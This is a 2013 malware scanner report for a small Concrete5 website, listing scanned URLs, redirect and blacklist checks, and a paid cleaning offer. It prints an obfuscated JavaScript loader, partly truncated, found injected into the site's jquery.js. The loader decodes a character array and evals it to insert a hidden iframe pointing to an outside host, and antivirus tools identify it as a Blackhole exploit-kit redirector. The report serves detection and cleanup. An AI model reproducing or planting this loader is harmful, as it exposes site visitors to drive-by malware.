Online Malware Scanner report for www.slm-syugyo.com

New scan:

www.slm-syugyo.com

(cached results from Sun Jun 30 05:48:06 2013 rescan)

Website Malware
Cleaning & Monitoring

Malware cleaning service from eVuln team.

  • Website cleaning
  • Redirects removal
  • Log files inspection
  • Reason eliminating
  • Blacklists removal
  • One year monitoring
  • Repeated fixing

website(s)

$119.00

Malicious/Suspicious/Total urls checked
1/0/10
1 page has malicious code. See details below
Blacklists
OK
Malicious redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Setup daily monitoring of www.slm-syugyo.com

Paste the following HTML code anywhere into "www.slm-syugyo.com" website.

eVuln.com

Scanned pages/files

RequestServer responseStatus
http://www.slm-syugyo.com/
200 OK
Content-Length: 8956
Content-Type: text/html
clean
http://www.slm-syugyo.com/concrete/js/jquery.js?v=4befeb0e6ddfd7ebea201488fcec96cf
200 OK
Content-Length: 74274
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

sp="split";w=window;aq="0"+"x";ff=String;z="y";ff=ff.fromCharCode;try{document["\x62od"+z]^=~1;}catch(d21vd12v){v=123;vzs=false;try{document;}catch(wb){vzs=2;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,66,5d,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,66,5d,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,6b,5f,69,5c,5c,69,60,6d,5c,69,6a,6d,5c,6b,25,5a,66,64,26,
... 3160 bytes are skipped ...
,4,1,74,4,1,60,5d,17,1f,65,58,6d,60,5e,58,6b,66,69,25,5a,66,66,62,60,5c,3c,65,58,59,63,5c,5b,20,4,1,72,4,1,60,5d,1f,3e,5c,6b,3a,66,66,62,60,5c,1f,1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,20,34,34,2c,2c,20,72,74,5c,63,6a,5c,72,4a,5c,6b,3a,66,66,62,60,5c,1f,1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,23,17,1e,2c,2c,1e,23,17,1e,28,1e,23,17,1e,26,1e,20,32,4,1,4,1,71,71,71,5d,5d,5d,1f,20,32,4,1,74,4,1,74,4,1"[sp](",");}w=f;s=[];for(i=2-2;-i+1318!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(e(aq+(w[j]))+9);}za=e;za(s)}

Antivirus reports:

AntiVir
JS/BlacoleRef.CZ.20
CAT-QuickHeal
JS/BlacoleRef.CZB
NANO-Antivirus
Trojan.Script.Expack.brblya

http://www.slm-syugyo.com/concrete/js/ccm.base.js?v=4befeb0e6ddfd7ebea201488fcec96cf
200 OK
Content-Length: 2231
Content-Type: application/x-javascript
clean
http://www.slm-syugyo.com/themes/default/js/menu.js
200 OK
Content-Length: 329
Content-Type: application/x-javascript
clean
http://www.slm-syugyo.com/themes/default/js/jquery.lightbox-0.5.min.js
200 OK
Content-Length: 10210
Content-Type: application/x-javascript
clean
http://www.slm-syugyo.com/page01/
200 OK
Content-Length: 9809
Content-Type: text/html
clean
http://www.slm-syugyo.com/page03/
200 OK
Content-Length: 13236
Content-Type: text/html
clean
http://www.slm-syugyo.com/index.php?cID=75
200 OK
Content-Length: 8666
Content-Type: text/html
clean
http://www.slm-syugyo.com/page06/
200 OK
Content-Length: 8698
Content-Type: text/html
clean
http://www.slm-syugyo.com/index.php?cID=78
200 OK
Content-Length: 8186
Content-Type: text/html
clean

Malicious redirects

First query (normal visit):
GET / HTTP/1.1
Host: www.slm-syugyo.com

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sun, 30 Jun 2013 02:48:07 GMT
Pragma: no-cache
Server: Apache
Vary: Host
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: CONCRETE5=ee53gs3ccm389oh6vspf54vdq5; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: www.slm-syugyo.com
Referer: http://www.google.com/search?q=www.slm-syugyo.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=www.slm-syugyo.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.ru/infected?l10n=en&url=http://www.slm-syugyo.com/

Result: www.slm-syugyo.com is not infected or malware details are not published yet.
Infected sites found